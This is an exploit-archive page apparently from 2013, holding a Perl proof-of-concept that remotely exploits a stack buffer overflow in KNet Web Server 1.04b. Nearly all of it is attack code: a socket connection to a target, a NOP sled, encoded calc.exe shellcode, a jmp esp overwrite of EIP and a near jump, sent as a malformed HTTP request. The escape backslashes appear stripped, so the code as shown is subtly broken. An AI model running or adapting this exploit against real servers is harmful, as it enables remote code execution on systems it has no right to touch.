KNet Web Server 1.04b - Stack Corruption BoF

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : KNet Web Server 1.04b - Stack Corruption BoF
# Published : 2013-04-12
# Author :
# Previous Title : Nagios Remote Plugin Executor Arbitrary Command Execution
# Next Title : HP System Management Anonymous Access Code Execution

#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3

use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul -
http://www.justanotherhacker.comn";
die "Usage $0 <host> <port>n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to
$host:$portn";

# Shellcode for calc.exe
$shellcode=
"x89xe2xdaxd5xd9x72xf4x5dx55x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x6bx4cx78x68x4ex69x45x50x73x30" .
"x63x30x61x70x6ex69x78x65x75x61x39x42x62x44" .
"x6cx4bx51x42x34x70x4ex6bx72x72x46x6cx4ex6b" .
"x71x42x37x64x4ex6bx44x32x36x48x54x4fx4ex57" .
"x53x7ax35x76x76x51x39x6fx44x71x4bx70x4ex4c" .
"x77x4cx35x31x73x4cx47x72x64x6cx67x50x4ax61" .
"x78x4fx54x4dx33x31x68x47x49x72x6ax50x73x62" .
"x63x67x6cx4bx52x72x66x70x6ex6bx53x72x77x4c" .
"x63x31x48x50x6ex6bx73x70x64x38x6ex65x69x50" .
"x52x54x50x4ax65x51x48x50x56x30x4cx4bx70x48" .
"x47x68x4cx4bx42x78x37x50x66x61x78x53x39x73" .
"x77x4cx57x39x4cx4bx75x64x4cx4bx77x71x38x56" .
"x70x31x59x6fx76x51x39x50x6cx6cx6fx31x6ax6f" .
"x34x4dx53x31x78x47x45x68x79x70x42x55x6bx44" .
"x77x73x61x6dx59x68x47x4bx51x6dx34x64x62x55" .
"x4dx32x31x48x4cx4bx71x48x47x54x37x71x4ex33" .
"x43x56x4ex6bx76x6cx32x6bx6cx4bx70x58x57x6c" .
"x36x61x79x43x6ex6bx73x34x6ex6bx33x31x4ax70" .
"x4bx39x73x74x34x64x54x64x63x6bx31x4bx65x31" .
"x33x69x72x7ax70x51x39x6fx69x70x70x58x31x4f" .
"x52x7ax6cx4bx36x72x58x6bx6bx36x73x6dx63x5a" .
"x55x51x4cx4dx6bx35x6cx79x35x50x63x30x65x50" .
"x66x30x35x38x46x51x6ex6bx50x6fx4cx47x79x6f" .
"x6ex35x4dx6bx5ax50x68x35x6fx52x62x76x42x48" .
"x6fx56x6dx45x4fx4dx6fx6dx4bx4fx7ax75x75x6c" .
"x66x66x31x6cx74x4ax6fx70x79x6bx4bx50x52x55" .
"x53x35x6dx6bx50x47x36x73x42x52x52x4fx72x4a" .
"x45x50x72x73x6bx4fx6bx65x30x63x33x51x52x4c" .
"x50x63x64x6ex51x75x42x58x45x35x57x70x41x41";

$dist=1003-length($shellcode);
$payload = "x90"x$dist; # Distance to overwrite EIP
$payload.=$shellcode;
$payload.="x90" x 8; #Spacer between EIP and shellcode
$payload.= "x53x93x42x7e"; #Overwrite EIP with jmp esp
$payload.="x90x90x90x90xE9xF4xFCxFFxFF"; #stack padding + BP +
Near jmp-300
$payload.=" / HTTP/1.0rnrn"; # Needs to be a valid HTTP request

print $sock $payload;